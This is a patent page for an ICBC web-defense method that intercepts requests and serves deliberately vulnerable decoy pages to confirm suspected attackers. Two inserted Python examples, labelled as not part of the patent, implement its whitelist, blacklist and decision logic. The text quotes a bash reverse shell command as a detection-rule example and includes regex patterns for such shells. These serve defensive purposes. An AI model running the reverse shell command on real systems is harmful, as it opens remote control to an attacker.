CN115694866A - Interactive attack confirmation method, device, system, equipment and medium - Google Patents


Info

Publication number: CN115694866A
Authority: CN (China)
Prior art keywords: attack, user, access request, service access, request
Legal status: Pending
Application number: CN202210855954.5A
Other languages: Chinese (zh)
Inventors: 旷亚和, 魏兴
Current Assignee: Industrial and Commercial Bank of China Ltd (ICBC)
Original Assignee: Industrial and Commercial Bank of China Ltd (ICBC)

Landscapes

  • Computer And Data Communications (AREA)

Abstract

The disclosure provides an interactive attack confirmation method and relates to the field of information security. The method comprises: intercepting a service access request sent by a user to an application server; performing attack detection on the service access request, where the attack detection detects attack behavior of the user; and, if the result of the attack detection shows that the service access request hits a specific behavior rule, returning an attack inducement response page in response to the service access request so as to perform interactive attack detection on the user N times. Attack behavior can be analyzed and intercepted in real time with fast response. Multiple interactions improve the accuracy of the judgment, so attack recognition accuracy rises substantially while normal service processing is preserved, and the defender's real-time defense capability improves as a whole. The disclosure also provides an interactive attack confirmation apparatus, system, device, storage medium and program product.

Description

Interactive attack confirmation method, device, system, equipment and medium
Technical Field
The present disclosure relates to the field of information security, and more particularly, to an interactive attack validation method, apparatus, system, device, medium, and program product.
Background
In a network security monitoring scenario, because application services are complex, some normal service transactions may also hit the alarm rules and trigger an alarm on the monitoring device. To avoid disrupting normal services, many monitoring devices adopt a release (pass-through) policy for behavior that cannot be confirmed as an attack, so genuine attack behavior is likely to be released as well. At present the compensating scheme for this situation relies mainly on manual confirmation against historical traffic after the fact.
In developing the inventive concept of the present disclosure, the inventors found at least the following problems in the related art: confirming attacks after the fact requires considerable labor, and the attack behavior cannot be blocked in real time during the incident, leaving a large potential security hazard.
Disclosure of Invention
In view of the foregoing, the present disclosure provides an interactive attack validation method, apparatus, system, device, medium, and program product capable of handling suspected attack behavior in real time.
One aspect of the embodiments of the present disclosure provides an interactive attack confirmation method, including: intercepting a service access request sent by a user to an application server; performing attack detection on the service access request, where the attack detection detects attack behavior of the user; and, if the result of the attack detection shows that the service access request hits a specific behavior rule, returning an attack inducement response page in response to the service access request so as to perform interactive attack detection on the user N times, where N is an integer greater than or equal to 1 and the attack inducement response page contains an attack vulnerability.
According to an embodiment of the present disclosure, performing interactive attack detection on the user N times includes repeating the following steps until they have been executed N times or a predetermined condition is met: intercepting an attack inducement request sent by the user to the application server, where the attack inducement request is an access request the user sends in response to the attack inducement response page; performing the attack detection on the attack inducement request; and, if the attack inducement request hits a specific behavior rule, returning the attack inducement response page in response to the attack inducement request.
According to an embodiment of the present disclosure, the predetermined condition is that the attack inducement request is confirmed to hit, or confirmed not to hit, an attack behavior rule: if the attack inducement request hits an attack behavior rule, the IP address of the user is added to a blacklist library and the loop ends; if the attack inducement request hits neither an attack behavior rule nor a specific behavior rule, it is confirmed that no attack behavior exists and the loop ends.
According to an embodiment of the present disclosure, before each return of the attack inducement response page, the method further includes randomly selecting the attack inducement response page for the current round from an attack test library, where the attack test library contains M attack inducement response pages, each with a different attack vulnerability.
According to an embodiment of the present disclosure, after intercepting a service access request sent by a user to an application server, the method further includes storing the service access request under a user identifier of the user; if the service access request hits the specific behavior rule, the N rounds of interactive attack detection are carried out based on that user identifier.
According to an embodiment of the present disclosure, if it is determined that no attack behavior exists, the method further includes sending the stored service access request to the application server.
According to an embodiment of the present disclosure, performing attack detection on the service access request or the attack inducement request includes matching the request against an attack test library that contains attack behavior rules and the specific behavior rules; and/or performing at least one of the following: matching the IP address of the user against at least one whitelist address in a whitelist library, where a whitelist address causes the service access request to be released directly; and matching the IP address of the user against at least one blacklist address in a blacklist library, where a blacklist address causes the service access request to be blocked directly.
Another aspect of the embodiments of the present disclosure provides an interactive attack confirmation apparatus, including: a request interception module for intercepting a service access request sent by a user to the application server; an attack detection module for performing attack detection on the service access request, where the attack detection detects attack behavior of the user; and an attack inducement module for returning, if the result of the attack detection shows that the service access request hits a specific behavior rule, an attack inducement response page in response to the service access request so as to perform N rounds of interactive attack detection on the user, where N is an integer greater than or equal to 1 and the attack inducement response page contains an attack vulnerability.
Another aspect of the embodiments of the present disclosure provides an interactive attack validation system, including: the client is used for responding to the operation of the user and sending a service access request to the application server; the monitoring server is used for executing the interactive attack confirmation method, and sending the service access request to the application server under the condition that the user is confirmed to have no attack behavior; and the application server is used for receiving the service access request sent by the monitoring server.
Another aspect of the disclosed embodiments provides an electronic device, including: one or more processors; a storage device to store one or more programs, wherein the one or more programs, when executed by the one or more processors, cause the one or more processors to perform the method as described above.
Another aspect of the embodiments of the present disclosure also provides a computer-readable storage medium having executable instructions stored thereon, which when executed by a processor, cause the processor to perform the method as described above.
Yet another aspect of the disclosed embodiments provides a computer program product comprising a computer program that when executed by a processor implements the method as described above.
One or more of the above embodiments have the following advantageous effects. First, the service access request is intercepted before the application server receives it; suspected attack traffic that hits a specific behavior rule and triggers an alarm is subjected to a second or further round of attack inducement confirmation, and whether the access request is attack behavior is decided from that, so attack behavior can be analyzed and intercepted in real time with fast response. Second, the accuracy of the decision improves with multiple interactions: attack recognition accuracy rises substantially while normal service processing is preserved, and the defender's real-time defense capability improves as a whole.
Drawings
The foregoing and other objects, features and advantages of the disclosure will be apparent from the following description of embodiments of the disclosure, taken in conjunction with the accompanying drawings of which:
FIG. 1 schematically illustrates an architecture diagram of an interactive attack validation system according to an embodiment of the present disclosure;
FIG. 2 schematically shows a block diagram of an attack determination module according to an embodiment of the present disclosure;
FIG. 3 schematically shows a block diagram of an interaction module according to an embodiment of the present disclosure;
FIG. 4 schematically illustrates a flow chart of an interactive attack validation method according to an embodiment of the disclosure;
FIG. 5 schematically illustrates a flow chart for performing attack detection based on user identification according to an embodiment of the disclosure;
FIG. 6 schematically illustrates a flow diagram of interactive attack detection according to an embodiment of the disclosure;
FIG. 7 schematically illustrates a flow diagram of attack detection according to an embodiment of the disclosure;
FIG. 8 schematically illustrates a flow chart of an interactive attack validation method according to another embodiment of the present disclosure;
FIG. 9 schematically shows a block diagram of an interactive attack confirmation apparatus according to an embodiment of the present disclosure; and
FIG. 10 schematically shows a block diagram of an electronic device adapted to implement the interactive attack confirmation method according to an embodiment of the present disclosure.
Detailed Description
Hereinafter, embodiments of the present disclosure will be described with reference to the accompanying drawings. It should be understood that the description is illustrative only and is not intended to limit the scope of the present disclosure. In the following detailed description, for purposes of explanation, numerous specific details are set forth in order to provide a thorough understanding of the embodiments of the disclosure. It may be evident, however, that one or more embodiments may be practiced without these specific details. Moreover, in the following description, descriptions of well-known structures and techniques are omitted so as to not unnecessarily obscure the concepts of the present disclosure.
The terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the disclosure. The terms "comprises," "comprising," and the like, as used herein, specify the presence of stated features, steps, operations, and/or components, but do not preclude the presence or addition of one or more other features, steps, operations, or components.
All terms (including technical and scientific terms) used herein have the same meaning as commonly understood by one of ordinary skill in the art unless otherwise defined. It is noted that the terms used herein should be interpreted as having a meaning that is consistent with the context of this specification and should not be interpreted in an idealized or overly formal sense.
Where a convention analogous to "at least one of A, B, and C, etc." is used, in general such a construction is intended in the sense one having skill in the art would understand the convention (e.g., "a system having at least one of A, B, and C" would include but not be limited to systems that have A alone, B alone, C alone, A and B together, A and C together, B and C together, and/or A, B, and C together, etc.).
Fig. 1 schematically shows an architecture diagram of an interactive attack validation system according to an embodiment of the present disclosure. Fig. 2 schematically shows a block diagram of the structure of the attack determination module according to an embodiment of the present disclosure. Fig. 3 schematically shows a block diagram of an interaction module according to an embodiment of the present disclosure.
As shown in fig. 1, an interactive attack confirmation system 100 according to this embodiment may include a client 101, a monitoring server 102, and an application server 103. The monitoring server 102 may include a list library determining module 104, an attack determining module 105, an interaction module 106, and an attack blocking module 107. The monitoring server 102 is inserted in series in the link between the client 101 and the application server 103 and can capture access traffic from the client 101 to the application server 103 in real time.
According to an embodiment of the present disclosure, the client 101 is configured to send a service access request to the application server 103 in response to an operation by a user. The monitoring server 102 is configured to intercept the service access request, perform attack detection on it and, if the result of the attack detection shows that the service access request hits a specific behavior rule, return an attack inducement response page in response to the service access request so as to perform interactive attack detection on the user N times, where N is an integer greater than or equal to 1 and the attack inducement response page contains an attack vulnerability. If it is confirmed that the user shows no attack behavior, the service access request is sent to the application server 103. The application server 103 is configured to receive the service access request sent by the monitoring server 102.
Exemplarily, the list library determining module 104 may include a whitelist library and a blacklist library. The whitelist fields include the access IP address (Internet Protocol address), the name of the attack alarm that was triggered, the storage time, and a validity deadline. The validity deadline may, purely as an example, be 12 hours; an entry is deleted automatically once it expires, and if the same user triggers an alarm again it must pass verification again before re-entering the whitelist library. An IP address in the whitelist library is not blocked when it accesses the application. The blacklist library fields include the access IP, the name of the triggered attack alarm and the storage time; IP addresses judged to show attack behavior are placed in the blacklist library on the basis of real-time interception, and any later request from an IP in the blacklist library is blocked directly.
Illustratively, referring to fig. 2, the attack determining module 105 may include an information collection unit 201 and an analysis unit 202. The information collection unit 201 collects the data in the traffic needed for attack judgment, including the request URL, request method, request body and request headers, and records the five-tuple of the traffic packet (source and destination address, source and destination port, protocol). The analysis unit 202 performs regular-expression matching on the traffic data collected by the information collection unit 201 against a built-in rule base: if an attack feature is hit, the data is sent directly to the attack blocking module 107 for interception; if only a suspected attack feature is hit, the data is passed on to the interaction module 106 for secondary confirmation of the attack behavior.
Illustratively, referring to fig. 3, the interaction module 106 may include an information storage unit 301 and a test repackaging unit 302. The information storage unit 301 stores the user's original request information. Because the monitoring server is deployed in front of the application server, it takes over all of the application server's traffic; when a request is found to carry attack risk and the user is challenged, the user's request information is recorded, and if the user is later judged to show no attack behavior, the recorded request is sent on to the application server and the response is collected and returned to the user, so the original service continues to be provided. The test repackaging unit 302 performs the interactive attack confirmation according to a preset attack test library.
For example, the attack blocking module 107 blocks the attack traffic identified by the attack determining module 105 and adds the corresponding access IP and triggered attack alarm name to the blacklist library, so that all subsequent access requests from that IP are blocked. An IP in the blacklist library stays blocked until security personnel explicitly unblock it.
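The list library determining module 104 and the attack blocking module 107 described above, as an added Python example that is not part of the patent: an in-memory whitelist/blacklist library with the 12-hour whitelist validity deadline, automatic expiry and manual unblocking. The field names and the 12-hour window come from the description; the class name, the method names and the "inspect" verdict (meaning neither list decides and rule-based detection must run) are this example's own choices.

```python
# Added example (not from the patent): white/black list library of module 104.
# Field names and the 12-hour validity deadline follow the description; the
# class, method names and the "inspect" verdict are this example's own.
from dataclasses import dataclass
from datetime import datetime, timedelta

WHITELIST_TTL = timedelta(hours=12)   # the example "validity deadline" in the text


@dataclass
class WhitelistEntry:
    ip: str
    alarm_name: str        # name of the attack alarm the IP triggered before verification
    stored_at: datetime    # storage time
    valid_until: datetime  # validity deadline; the entry is dropped after this


@dataclass
class BlacklistEntry:
    ip: str
    alarm_name: str
    stored_at: datetime


class ListLibrary:
    """Whitelist entries expire; blacklist entries persist until manually unsealed."""

    def __init__(self) -> None:
        self._white = {}   # ip -> WhitelistEntry
        self._black = {}   # ip -> BlacklistEntry

    def add_whitelist(self, ip: str, alarm_name: str, now: datetime) -> None:
        # Called after interactive confirmation found no attack behavior.
        self._white[ip] = WhitelistEntry(ip, alarm_name, now, now + WHITELIST_TTL)

    def add_blacklist(self, ip: str, alarm_name: str, now: datetime) -> None:
        # Called by the attack blocking module. A confirmed attacker must not
        # keep an earlier whitelist entry, so the two lists never overlap.
        self._black[ip] = BlacklistEntry(ip, alarm_name, now)
        self._white.pop(ip, None)

    def unseal(self, ip: str) -> bool:
        """Manual release by security personnel; the only way off the blacklist."""
        return self._black.pop(ip, None) is not None

    def lookup(self, ip: str, now: datetime) -> str:
        """Return 'block', 'pass' or 'inspect' for a source address.

        'inspect' means neither list decides and the request must go through
        rule-based attack detection (module 105)."""
        if ip in self._black:
            return "block"
        entry = self._white.get(ip)
        if entry is not None:
            if now <= entry.valid_until:
                return "pass"
            del self._white[ip]   # expired: the next alarm must be re-verified
        return "inspect"

    def purge_expired(self, now: datetime) -> int:
        """Housekeeping pass removing every expired whitelist entry; returns the count."""
        expired = [ip for ip, e in self._white.items() if now > e.valid_until]
        for ip in expired:
            del self._white[ip]
        return len(expired)


if __name__ == "__main__":
    lib = ListLibrary()
    t0 = datetime(2024, 1, 1, 0, 0)
    lib.add_whitelist("10.0.0.1", "cmd_exec_suspect", t0)
    print(lib.lookup("10.0.0.1", t0 + timedelta(hours=11)))   # pass
    print(lib.lookup("10.0.0.1", t0 + timedelta(hours=13)))   # inspect
```

The blacklist is consulted before the whitelist, and `add_blacklist` removes any whitelist entry for the same address, so a confirmed attacker can never be released on the strength of an earlier clean verdict.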
It should be noted that the interactive attack confirmation method provided by the embodiments of the present disclosure is generally executed by the monitoring server 102, and accordingly the interactive attack confirmation apparatus is generally disposed in the monitoring server 102. The method may also be executed by a server or server cluster that is different from the monitoring server 102 and communicates with it, in which case the apparatus is disposed in that server or server cluster.
It should be understood that the number of clients, monitoring servers, and application servers in fig. 1 is merely illustrative. The monitoring server and the application server may be in a centralized deployment or a distributed deployment. There may be any number of clients, monitoring servers, and application servers, as desired for implementation.
The interactive attack validation method according to the embodiment of the present disclosure will be described in detail below with reference to the system described in fig. 1, with reference to fig. 2 to 8.
Fig. 4 schematically shows a flow chart of an interactive attack validation method according to an embodiment of the present disclosure.
As shown in fig. 4, the interactive attack confirmation of this embodiment includes operations S410 to S430.
In operation S410, a service access request sent by a user to an application server is intercepted.
Illustratively, referring to fig. 1, a user may operate a client 101 installed on a terminal device (such as a mobile phone, desktop computer or notebook computer) to send a service access request, which may be an HTTP request, to the application server 103. Before the application server 103 receives the request, the service access request traffic (a plurality of service access requests forming the traffic) is captured in advance by the monitoring server 102.
In operation S420, an attack detection is performed on the service access request, where the attack detection is used to detect an attack behavior of a user.
Illustratively, an attack behavior includes any type of offensive action directed to a computer information system, infrastructure, computer network, or personal computer device. For computers and computer networks, destroying, revealing, modifying, disabling software or services, stealing or accessing data from any computer without authorization, is considered an attack in computers and computer networks. Attack detection involves the use of network technologies that are capable of detecting abnormal, illegal activities on the network.
In operation S430, based on the result of the attack detection, if the service access request hits the specific behavior rule, the attack guidance response page is returned in response to the service access request, so as to perform N times of interactive attack detection on the user, where N is an integer greater than or equal to 1, and the attack guidance response page has an attack vulnerability.
Illustratively, if the result of the attack detection indicates that the service access request is a normal request, it is released to the application server; if the result indicates that it is an attack request, it is blocked directly.
Illustratively, a specific behavior rule may include one or more high-risk behavior rules. A high-risk behavior rule is one for which existing detection equipment or systems cannot fully confirm that attack behavior exists, and for which the related art therefore adopts a release policy rather than direct blocking. The attack inducement response page uses the attack vulnerability it contains to induce the user to launch a network attack, so that attack detection can continue during the subsequent interaction with the user. The attack vulnerability here is a deliberate flaw in the page or its code that lets an attacker carry out attack behavior against the page without giving the attacker access to the real network or system.
According to the embodiment of the disclosure, the service access request is intercepted before the application server receives it, and suspected attack traffic that hits a specific behavior rule and triggers an alarm is subjected to a second or further round of attack inducement confirmation through attack detection, so that whether the access request is attack behavior can be judged and the attack analyzed and intercepted in real time with fast response. The accuracy of the judgment improves through multiple interactions: attack identification accuracy rises substantially while normal service processing is preserved, and the defender's real-time defense capability improves as a whole.
Fig. 5 schematically shows a flow chart for performing attack detection based on user identification according to an embodiment of the present disclosure.
After intercepting the service access request sent by the user to the application server in operation S410, as shown in fig. 5, the embodiment performs attack detection based on the user identification, including operations S510 to S520.
In operation S510, the service access request is stored based on the user identification of the user.
For example, referring to fig. 3, the information storage unit 301 may parse the service access request to obtain a user identifier (such as an account number, a cookie, a uid, or the like) to store the original request information of the user, i.e., the service access request. In some embodiments, all traffic intercepted may be stored. In other embodiments, storage may occur when a particular behavior rule is hit, which may save storage space.
In operation S520, if the service access request hits the specific behavior rule, N times of interactive attack detection are performed based on the user identifier.
Because the monitoring server 102 may receive requests from a plurality of clients, when a plurality of service access requests hit a specific behavior rule, a mapping relationship between original request information and interactive attack detection may be formed in an interactive attack detection process by using a unique user identifier, so as to finally accurately process the original request information when confirming whether an attack behavior exists.
Fig. 6 schematically shows a flow diagram of interactive attack detection according to an embodiment of the present disclosure.
As shown in fig. 6, the interactive attack detection of this embodiment includes performing operations S610 to S660 in a loop until the loop is performed N times or a predetermined condition is satisfied.
In operation S610, an attack inducement request sent by a user to an application server is intercepted, where the attack inducement request includes an access request sent by the user in response to an attack inducement response page.
For example, the attack inducement request may be an HTTP request; it differs from the service access request in that it is issued by the client through the user's operation on the attack inducement page. The attack inducement page may be presented to the user in the form of a verification page, such as a slide verification, a captcha, or a mobile-phone verification code.
In operation S620, attack detection is performed on the attack inducement request.
Illustratively, the attack inducement request may be subjected to the same attack detection as the service access request. In some embodiments, the detection content may also differ: the attack vulnerability in the attack inducement page that the request responds to can be looked up, and a detection rule targeted at that vulnerability applied, either on its own or in addition to the rules applied to the service access request.
In operation S630, if the attack inducement request hits a specific behavior rule, an attack inducement response page is returned in response to the attack inducement request.
According to an embodiment of the present disclosure, before each return of the attack inducement response page, the method further includes randomly selecting the attack inducement response page from the attack test library, where the attack test library contains M attack inducement response pages, each with a different attack vulnerability.
Illustratively, the preset attack test library may include a file-upload vulnerability test library, an SQL injection vulnerability test library, a command execution vulnerability test library, and the like. Referring to fig. 3, when performing interactive attack confirmation the test repackaging unit 302 randomly selects a page with an obvious vulnerability to induce the user into an attack attempt. The selection is random mainly so that an attacker cannot learn the detection pattern: if every attack payload triggered the same fixed attack inducement page, the attacker would easily recognize that this protection is in place and make targeted bypass attempts. A malicious user performing penetration will, with high probability, send more obvious attack traffic, and if the corresponding attack attempt matches a rule, further access from the IP is blocked by the attack blocking module 107. Conversely, if no attack feature appears across one or more inducement rounds, the user is taken to be a normal user operating the service system and the access IP can be added to the whitelist library.
In operation S640, if it is determined that the attack inducing request hits the attack behavior rule, the IP address of the user is added to the blacklist library, and the loop is ended.
Illustratively, the attack behavior rule is used for detecting the attack characteristics in the attack induction request, and when the attack characteristics occur, the existence of the attack behavior can be confirmed.
In operation S650, if it is confirmed that the attack inducement request does not hit the attack behavior rule and the specific behavior rule, it is confirmed that there is no attack behavior, and the loop is ended. The user's IP address is added to the whitelist library.
Taking a command execution vulnerability as an example: if an attack behavior rule matches a reverse shell command such as bash -i >/dev/tcp/ip/port 0>&1 2>&1, the request is blocked directly as confirmed attack behavior. If the matched request contains the string touch /tmp (a specific behavior rule), attack probing may be present, but the command cannot by itself cause real harm; it may be attack behavior or it may be a legitimate service function, so further judgment is needed and the case is sent to the interaction module for secondary confirmation of the attack behavior.
According to the embodiment of the disclosure, the traffic is monitored in real time with rules of different kinds, every risky access request can be handled comprehensively and accurately, and the situation in the related art where suspected attack requests are released and may turn out to be actual attacks is avoided.
In operation S660, it is checked whether the current loop is the Nth. If so, the loop ends; if not, operation S610 is executed again.
Illustratively, the maximum number of interactive verifications can be configured flexibly, and the system may also ship a built-in default; for example, if no confirmed attack feature is found after three rounds of interaction, the request is released.
According to the embodiment of the present disclosure, if it is determined that there is no attack behavior after the loop is finished, the method further includes: sending the service access request to the application server.
Illustratively, if the maximum number of interactive verifications has been completed and every round was suspected to be an attack request (hit a specific behavior rule) but no attack behavior was confirmed, the test loopback unit 302 determines that the user has no attack behavior, extracts the user's original request information stored in the information storage unit 301 based on the user identifier, retransmits it, obtains and returns the normal response packet for the original request, and continues to provide the original service to the user, ensuring that the original normal service is carried out.
Illustratively, attack inducement requests and service access requests are handled differently. The attack inducement request serves to induce a potentially malicious user to initiate attack behavior, while the service access request serves the user's normal service processing. For example, in the Nth cycle the attack inducement request either misses the attack behavior rule and/or the specific behavior rule, or hits a specific behavior rule; in either case the attack inducement request may be discarded, while the service access request is released.
Fig. 7 schematically shows a flow diagram of attack detection according to an embodiment of the disclosure.
As shown in fig. 7, the attack detection in operation S420 or operation S620 includes operations S710 to S770.
In operation S710, the IP address of the user is matched with at least one white list address in the white list library, where the at least one white list address is used for directly passing through the service access request.
In operation S720, it is determined whether the IP address of the user is a white list address. If so, operation S730 is performed. If not, operation S740 is performed.
In operation S730, the service access request is directly released to the application server.
In operation S740, the IP address of the user is matched with at least one blacklist address in a blacklist repository, where the at least one blacklist address is used for directly blocking a service access request.
In operation S750, it is determined whether the IP address of the user is a blacklist address. If yes, operation S760 is performed. If not, operation S770 is performed.
In operation S760, the service access request is blocked.
In operation S770, the service access request or the attack-inducing request is matched using an attack test library including attack behavior rules and specific behavior rules.
According to the embodiment of the disclosure, all traffic first passes through the monitoring server, where the list library judging module 104 judges whether the source IP hits the built-in black and white lists, performing the first round of attack filtering. The attack determination module 105 then performs a secondary determination on the traffic characteristics, screening out traffic with suspected attack characteristics by regular-expression matching. Traffic determined to be an attack is sent directly to the attack blocking module 107 to be blocked. An access request that cannot be determined to be attack behavior is sent to the interaction module 106, which responds with an inducing page; if the requester is an attacker, it will with high probability perform a more obvious attack operation on the new response page. If attack behavior is then found in the new traffic, the request is sent to the attack blocking module to be blocked, and a request that still cannot be accurately judged as an attack can undergo multiple rounds of interactive verification until the risk is finally confirmed.
According to the embodiment of the disclosure, the efficiency and accuracy of attack detection can be improved by combining matching against the white list library or the black list library with matching against the attack test library.
It should be noted that the order of matching the white list library, matching the black list library and matching the attack test library is not limited to the description in operations S710 to S770. The order of matching the white list library, the black list library and the attack test library can be flexibly adjusted according to actual needs.
Fig. 8 schematically shows a flow chart of an interactive attack validation method according to another embodiment of the present disclosure.
As shown in fig. 8, the interactive attack confirmation method of this embodiment includes operations S801 to S808.
Operation S801: connecting the monitoring server into the network environment and capturing service access traffic in real time.
Operation S802: querying whether the access IP is in the white list library; if so, releasing the request and forwarding it to the target application server (one monitoring server may serve a plurality of application servers).
Operation S803: otherwise, querying whether the access IP is in the black list library; if so, directly dropping the packet and blocking the request.
Operation S804: otherwise, judging with the attack test library whether the request traffic hits an attack characteristic. If the request matches no rule, it is released directly and forwarded to the target application server. If it hits an attack behavior rule, the request is blocked directly and the IP is recorded in the black list.
In some embodiments, if neither an attack characteristic nor a suspected attack characteristic is hit, the loop may be ended and the original request information released.
Operation S805: if the high-risk behavior rule is missed, storing the user's original request information.
Here a miss means that no attack characteristic in the attack behavior rules was hit, but a suspected attack characteristic in a specific behavior rule was hit.
Operation S806: randomly selecting an attack response page from the attack test library and sending it to the user.
Operation S807: judging whether the request in the second interaction contains an attack characteristic; if so, blocking the request directly and recording the IP in the black list. If it still contains only high-risk (suspected) behavior, returning to operation S806 to randomly select another response page to send to the user, up to three interactions.
In some embodiments, if neither an attack characteristic nor a suspected attack characteristic is hit in a given cycle, the cycle may be ended and the original request information released. In other embodiments, even if neither is hit in a given cycle, the next cycle may still be executed because a suspected attack request occurred earlier in the interaction.
Operation S808: if no attack behavior is found during the interactive test and the maximum number of interactions has been reached, the original user request information stored in operation S805 is retrieved and answered as normal service traffic; at the same time the IP is recorded in the white list and attack judgment is no longer performed on it for a period of time.
According to the embodiment of the disclosure, in order to eliminate false alarms effectively and to judge and block attack behavior accurately, traffic that is monitored but cannot be confirmed as attack behavior in the related art is answered with a second or further induced response, triggering interactive verification: if verification passes, the requester is judged a normal user; if it fails, the traffic is judged attack behavior and the IP is blocked at the same time. Attack behavior can thus be intercepted in real time, and both the accuracy of the protective equipment's judgment and the timeliness of attack interception are greatly improved.
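The decision flow of operations S610 to S660, S710 to S770 and S801 to S808 above, as an added example that is not part of the patent and not the applicant's code. The rule patterns (built from the reverse shell and touch /tmp examples in the description), the induction page names and the in-memory list libraries are constructed placeholders; the "end the loop when nothing hits" embodiment is the one implemented.

```python
"""Monitoring-server decision flow of this patent (operations S610-S660,
S710-S770 and S801-S808), written as an added example; it is not the
applicant's code.  Rule patterns, page names and the in-memory list
libraries are constructed placeholders."""
import random
import re
from dataclasses import dataclass, field
from typing import Optional

# Attack test library (constructed from the description's examples).
# Attack behavior rules confirm an attack; specific behavior rules mark a
# suspected attack that may still be legitimate service traffic.
ATTACK_BEHAVIOR_RULES = [re.compile(r"/dev/tcp/[\w.:-]+/\d+")]  # reverse-shell redirection
SPECIFIC_BEHAVIOR_RULES = [re.compile(r"\btouch\s+/tmp\b")]      # probing, possibly benign


@dataclass
class Verdict:
    action: str                      # "release", "block" or "induce"
    reason: str
    page: Optional[str] = None       # induction page returned (action == "induce")
    forwarded: Optional[str] = None  # request forwarded to the application server


@dataclass
class MonitoringServer:
    max_rounds: int = 3                                    # N interactive verifications
    induce_pages: tuple = ("page_a", "page_b", "page_c")   # M induction pages (placeholders)
    whitelist: set = field(default_factory=set)
    blacklist: set = field(default_factory=set)
    stored: dict = field(default_factory=dict)   # user id -> original request (S805)
    rounds: dict = field(default_factory=dict)   # user id -> induction pages sent so far

    def match_rules(self, payload: str) -> Optional[str]:
        """Operation S770: returns 'attack', 'specific' or None."""
        if any(r.search(payload) for r in ATTACK_BEHAVIOR_RULES):
            return "attack"
        if any(r.search(payload) for r in SPECIFIC_BEHAVIOR_RULES):
            return "specific"
        return None

    def handle_service_request(self, user: str, ip: str, payload: str) -> Verdict:
        """First contact: list-library checks (S710-S760) then rule matching."""
        if ip in self.whitelist:                        # S730: pass through
            return Verdict("release", "whitelist", forwarded=payload)
        if ip in self.blacklist:                        # S760: block
            return Verdict("block", "blacklist")
        hit = self.match_rules(payload)
        if hit == "attack":                             # S804: confirmed, blacklist the IP
            self.blacklist.add(ip)
            return Verdict("block", "attack behavior rule")
        if hit is None:                                 # no rule hit: release
            return Verdict("release", "no rule hit", forwarded=payload)
        self.stored[user] = payload                     # S805: keep the original request
        self.rounds[user] = 0
        return self._induce(user)                       # S806: start interaction

    def _induce(self, user: str) -> Verdict:
        self.rounds[user] += 1
        page = random.choice(self.induce_pages)         # random page, as in S806
        return Verdict("induce", f"round {self.rounds[user]}", page=page)

    def _finish(self, user: str) -> Optional[str]:
        """End the loop and hand back the stored original request, if any."""
        self.rounds.pop(user, None)
        return self.stored.pop(user, None)

    def handle_induced_request(self, user: str, ip: str, payload: str) -> Verdict:
        """One iteration of S610-S660 for a request sent in reply to an induction page."""
        if user not in self.rounds:                     # no interaction in progress
            return self.handle_service_request(user, ip, payload)
        hit = self.match_rules(payload)
        if hit == "attack":                             # S640: confirmed attack
            self.blacklist.add(ip)
            self._finish(user)
            return Verdict("block", "attack behavior rule")
        if hit is None:                                 # S650: no attack, whitelist
            self.whitelist.add(ip)
            return Verdict("release", "no rule hit", forwarded=self._finish(user))
        if self.rounds[user] >= self.max_rounds:        # S660 / S808: Nth round reached
            self.whitelist.add(ip)                      # no expiry implemented here
            return Verdict("release", "max rounds reached", forwarded=self._finish(user))
        return self._induce(user)                       # S630: keep interacting
```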
Based on the interactive attack confirmation method, the disclosure also provides an interactive attack confirmation device. The apparatus will be described in detail below with reference to fig. 9.
Fig. 9 schematically shows a block diagram of an interactive attack validation apparatus according to an embodiment of the present disclosure.
As shown in fig. 9, the interactive attack validation apparatus 900 of this embodiment includes a request interception module 910, an attack detection module 920, and an attack induction module 930.
The request intercepting module 910 may perform operation S410 for intercepting a service access request sent by a user to an application server.
The attack detection module 920 may perform operation S420 to perform attack detection on the service access request, where the attack detection is used to detect an attack behavior of the user.
Illustratively, the attack detection module 920 may function similarly to the list library judging module 104 and the attack determination module 105, and may implement the judgment logic of both.
Illustratively, the attack detection module 920 may perform operations S510 to S520 for storing the service access request based on the user identification of the user after intercepting the service access request sent by the user to the application server. And if the service access request hits the specific behavior rule, carrying out N times of interactive attack detection based on the user identification.
Illustratively, the attack detection module 920 may randomly select the attack induction response page for the current round from an attack test library, where the attack test library includes M attack induction response pages and each attack induction response page has a different attack vulnerability. It may also perform operations S710 to S770 to match the service access request or the attack inducement request using an attack test library that includes attack behavior rules and specific behavior rules, and/or perform at least one of the following detection steps: matching the IP address of the user against at least one white list address in a white list library, where the at least one white list address is used to directly release the service access request; and matching the IP address of the user against at least one black list address in a black list library, where the at least one black list address is used to directly block the service access request.
The attack induction module 930 may perform operation S430: based on the result of the attack detection, if the service access request hits the specific behavior rule, the attack induction response page is returned in response to the service access request so as to perform N times of interactive attack detection on the user, where N is an integer greater than or equal to 1 and the attack induction response page has an attack vulnerability.
Illustratively, the attack induction module 930 may function similarly to the interaction module 105 and may implement the interaction flow of the interaction module 105.
The attack induction module 930 may perform operations S610 to S660, which are not described again here.
Illustratively, the interactive attack validation apparatus 900 may further include an attack blocking module 107.
Illustratively, the interactive attack validation apparatus 900 may further include a request release module, configured to send the service access request to the application server if it is confirmed that there is no attack behavior.
It should be noted that the implementation, solved technical problems, implemented functions, and achieved technical effects of each module/unit/subunit and the like in the apparatus part embodiment are respectively the same as or similar to the implementation, solved technical problems, implemented functions, and achieved technical effects of each corresponding step in the method part embodiment, and are not described herein again.
According to the embodiment of the present disclosure, any plurality of the request intercepting module 910, the attack detecting module 920 and the attack inducing module 930 may be combined into one module to be implemented, or any one of them may be split into a plurality of modules. Alternatively, at least part of the functionality of one or more of these modules may be combined with at least part of the functionality of the other modules and implemented in one module.
According to an embodiment of the present disclosure, at least one of the request intercepting module 910, the attack detecting module 920 and the attack inducing module 930 may be implemented at least partially as a hardware circuit, such as a Field Programmable Gate Array (FPGA), a Programmable Logic Array (PLA), a system on a chip, a system on a substrate, a system on a package, an Application Specific Integrated Circuit (ASIC), or may be implemented by hardware or firmware in any other reasonable manner of integrating or packaging a circuit, or implemented in any one of three implementations of software, hardware and firmware, or in a suitable combination of any of them. Alternatively, at least one of the request interception module 910, the attack detection module 920 and the attack induction module 930 may be implemented at least partly as a computer program module, which when executed, may perform a corresponding function.
Fig. 10 schematically shows a block diagram of an electronic device adapted to implement the interactive attack method according to an embodiment of the present disclosure.
